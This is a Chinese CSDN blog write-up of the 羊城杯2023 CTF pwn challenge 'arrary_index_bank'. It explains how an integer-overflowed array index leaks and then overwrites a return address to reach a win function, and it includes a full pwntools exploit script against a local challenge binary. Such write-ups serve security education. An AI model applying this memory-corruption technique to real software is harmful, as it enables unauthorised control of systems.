羊城杯2023 pwn-arrary_index_bank

于 2024-07-19 09:22:52 发布
阅读量184 收藏
点赞数 9
分类专栏: PWN 文章标签: 安全 网络 linux python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63451318/article/details/140539754
版权

文件保护
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

ida加载
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

程序中含有system函数初步判定可能为ret2text
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

存在整数溢出,不可以直接改地址,因为super_ai的返回地址一定比v1高所为不行
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

如何进行整数溢出呢?
举例
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

为什么十六进制的 0x4000 0000 0000 0007 * 8 会等于0x38呢,因为7*8产生了进位所以4被64位舍弃

思路
首先进行溢出
观察动态调试
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

发现RAX已经变成负数
cmp操作进行完比较相同为0不相同为1
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

进入分支
在这里插入图片描述
在这里插入图片描述

泄漏地址为rbp下一位
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

地址因为是十进制所以进行转换查看是否泄漏成功
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

完全成全
地址已经泄漏完成开始payload的搭建
接收地址
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

基地址计算
接收地址-super_ai的返回地址
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

也就是0x151b
更改为win地址
考虑堆栈平衡 + 0x1315
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

exp

from pwn import *

context(log_level='debug',arch='amd64',os='linux')

#本地文件
filename = './pwn'
io = process(filename)
#远程连接
#io = remote("127.0.0.1",8080)

elf = ELF(filename)
#libc = elf.libc
gdb.attach(io,'b *$rebase(0x13f4)')

#存在整数溢出,实现任意地址泄漏
def one_(idx):
	io.sendlineafter('> ','1')
	io.sendlineafter('Whose account?\n',str(idx))
	
#存在整数溢出,实现任意地址改写
def two_(idx,addr):
	io.sendlineafter('> ','2')
	io.sendlineafter('Whose account?\n',str(idx))
	pause()
	io.sendlineafter('How much?\n',str(addr))	

#泄漏super_ai的返回地址	
one_(-0x8000000000000000+7)	

#接收地址
io.recvuntil('] = ')
#计算基地址
nx_base = int(io.recvuntil("\n")[:-1],10) - 0x151b
print('nx_base:',hex(nx_base))
#10为转换之整形十进制

win_addr = nx_base + 0x1315
print('win_addr:',hex(win_addr))

#改写super_ai的返回地址
two_(-0x8000000000000000+7,win_addr)


io.interactive()
Sagice
关注
  • 9
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
191018 pwn-HITB_dubai polyfill
whklhhhh的博客
10-18 2万+
Polyfill 写作dubai-ctf,然而在阿布扎比举办233 风格迥异,被毛子吊锤一百遍啊一百遍 第二天主要在看一个wasm的pwn,发现了UAF的漏洞但是由于对heap没了解所以没写利用。队里的pwn手觉得没法用所以没写,最后偷了流量重发爽了一天。赛中修复了题目,但是并没有起效。事后分析了一下确实是那个UAF的洞。 题目文件 http是一个web演示接口,可以通过html+js+engin...
【攻防世界pwn-guess_num】
a_silly_coder的博客
01-15 1570
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
[羊城 2023 决赛]arrary_index_bank
A13837377363的博客
04-15 494
有用的函数就是查询和更改,且index
2023羊城决赛 pwn
qq_62172019的博客
09-18 280
因为库版本是2.23没有对top块大小做检查所以可以正应了题目的名字(house of force)发现第一次申请一个巨大的块泄露地址,第二次可以申请小于0x30的堆块修改top块的大小。第三次申请把malloc_got拿出来写上system第四次申请就成功getshell。注意:直接覆盖成后门地址会因为对齐出问题所以应该跳过push命令以后。没有开pie 堆地址存在固定位置上可以使用unlink攻击。-7的位置上面存在函数返回地址。成功getshell。成功getshell。成功getshell。
攻防世界-PWN-new_easypwn
aptx4869_li的博客
07-31 2527
攻防世界的格式化字符串漏洞利用,简单题
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
捷配总结的SMT工厂安全防静电规则
tyymm的博客
07-17 390
SMT工厂须熟记的安全防静电规则! 安全对于我们非常重要,特别是我们这种SMT加工厂,通常我们所讲的安全是指人身安全。 但这里我们须树立一个较为全面的安全常识就是在强调人身安全的同时亦必须注意设备、产品的安全。 电气: 怎样预防人身触电事故? 1、发现有损坏的开关,电线等电气安全隐患,赶快向有关人员报告处理。2、不懂电气技术的人对电气设备不要乱装、乱拆。3、不要用湿手、湿脚动用电气设备(如: 按开关、按钮)。4、清扫卫生时,不要用湿抹布擦电线、开关按钮,一定要搞卫生,请先断开电
AI安全系列——[第五空间 2022]AI(持续更新)
2201_76139143的博客
07-15 1009
最近很长时间没有更新,其实一直在学习AI安全,我原以为学完深度学习之后再学AI安全会更加简单些,但是事实证明理论转实践还是挺困难的,但是请你一定要坚持下去,因为“不是所有的坚持都有结果,但总有一些坚持,能从冰封的土地里,培育出十万朵怒放的蔷薇”题目来源:NSSCTF题目描述:噪声在大数据场景下有着重要的地位。工程师们苦于被噪声污染的数据,同时也使用噪声保护着隐私数据。这个挑战分为两个部分。挑战1:从噪声中恢复隐私向量有A,B两个实体。其中B是普通实体,A则是恶意攻击者。
OWASP 移动应用 2024 十大安全风险
shendong70的博客
07-14 1234
随着智能手机的快速发展,移动应用已经成为我们日常生活关系最密切的软件应用。开放全球应用程序安全项目(OWASP)基金会,致力于提高软件的安全性。自 2014、2016年发布了移动应用的十大风险后,今年再次发布2024版。这对移动应用软件的检查工具有着重要的指导作用。
浅谈安数云智能安全运营管理平台:DCS-SOAR
2401_82472120的博客
07-15 798
安数云DCS-SOAR平台致力于解决用户云上资产的安全运营问题,面对用户防护设备繁杂臃肿、安全事件难以及时响应、运营成本逐年上升的困境,安数云DCS-SOAR平台以安全大脑驱动为核心,建立运营体系,通过OneStep框架实现第三方安全产品的“无门槛接入、低门槛纳管”;威胁和告警数量不断增长,资源又不足以应对所有问题,在日常运营中,分析人员需要快速决定哪些告警需要处理,哪些可以忽略,但由于超负荷工作,很可能错过真正的威胁,在应对威胁和恶意攻击时出现误判,最终使网络及数据产生安全泄露,造成无可挽回的损失。
高性能、安全、低碳绿色的趋势下,锐捷网络发布三擎云办公解决方案 3.0
CSDN云计算
07-18 577
去确保性能体验流畅。与上一代产品相比,三擎云办公 3.0 新增 130+功能特性,不仅充分对标了主流云桌面平台的核心功能,如热补丁升级与第三方存储和计算平台支持,还通过一系列创新技术,如智能透明加密技术,独享应用虚拟化技术,增强协议技术,智能 IO 调度技术等,在体验、安全、降本、增效等多个维度上展现出差异化优势。近日,锐捷网络重磅发布了三擎云办公解决方案 3.0,针对新趋势下挑战,一口气推出了 130 多项功能特性,希望为用户构建一个集安全、高效、体验于一身,实现成本优化的云桌面办公系统环境。
高效守护:在Eureka中构筑服务的分布式安全防线
2401_85341950的博客
07-15 839
通过上述步骤和代码示例,我们展示了如何在Eureka中实现服务的分布式安全策略。这包括服务认证、授权机制的实现,以及数据传输加密等关键安全措施。Eureka作为服务发现框架,在分布式安全体系中发挥着核心作用。在微服务架构中,服务的安全性不容小觑。通过本文的介绍,我们希望能够帮助读者更好地理解和实现Eureka中的分布式安全策略,确保微服务之间的通信安全,构建一个更加安全、可靠的系统。注意:本文中的代码示例为简化模型,实际应用中应根据具体需求和安全标准进行选择和实现。
如何构建全生命周期的安全体系架构来确保容器的安全
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
07-15 566
容器技术在云原生应用和微服务架构中得到了广泛应用,其轻量、灵活和高效的特点使其成为现代IT环境中的重要工具。然而,尽管容器带来了许多优势,但其安全性问题也不容忽视。接下来跟随博主一起探索如何构建全生命周期的安全体系架构以确保容器的安全
从人工巡检到智能防控:智慧油气田安全生产的新视角
最新发布
TSINGSEE青犀视频官方技术博客
07-18 762
远程视频监控:支持7/24小时实时高清视频监控,视频画面1、4、9、16个可选,支持自定义视频轮播。
数据流通环节如何规避安全风险
goodxianping的专栏
07-15 350
针对国家、行业、地方、企业等不同层级,研究制定差异化的数据流通安全能力框架和管理规范。在数据产权、流通交易、收益分配、安全治理各项具体制度研究制定过程中,明确合规监管底线,分类清理规范不适应数据要素流通发展需要的行政许可、资质资格等事项,为数据流通参与主体的探索提供稳定预期,进一步释放各主体创新活力和内生动力。由于参与数据流通与交易的数据要素资源通常是经过组织加工的高质量数据集,甚至可能涉及国家核心战略利益,一旦发生针对数据流通环节的恶意事件,将造成较大负面影响,对数据要素市场的价值激活造成潜在威胁。
2023 羊城 pwn
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出扎实的漏洞利用能力和对各种漏洞类型的深刻理解。 在比赛中,选手们将不仅需要迅速理解并攻克给定的目标程序,还要在极短的时间内快速编写出最有效的漏洞利用代码。比赛中还可能涉及到逆向工程和加密算法的挑战,综合了对系统原理和网络安全的深入理解。 对于参赛选手来说,需要具备丰富的经验和深厚的技术功底,以应对各种复杂多变的攻击场景。他们需要灵活运用各种pwn技术和工具,快速定位和利用漏洞,最大限度地获取目标系统的控制权。 羊城pwn比赛将成为一次全球顶尖网络安全专家的盛会,也将极大地推动网络安全技术的发展和创新。这场比赛将不仅展现出各选手的技术实力,也将促进国际网络安全领域的交流与合作,为推动网络安全事业的发展贡献力量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sagice

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值